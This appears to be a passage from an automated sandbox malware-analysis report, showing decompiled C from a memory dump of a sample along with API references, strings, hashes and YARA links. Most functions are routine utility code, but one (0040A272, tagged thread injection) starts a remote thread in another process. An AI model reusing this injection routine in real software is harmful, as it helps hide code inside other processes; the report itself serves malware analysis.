				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

Y@, xrefs: 0040906D
LookupAccountSidW, xrefs: 0040907F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

shell32.dll, xrefs: 0040AC5B
SHGetSpecialFolderPathW, xrefs: 0040AC6F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
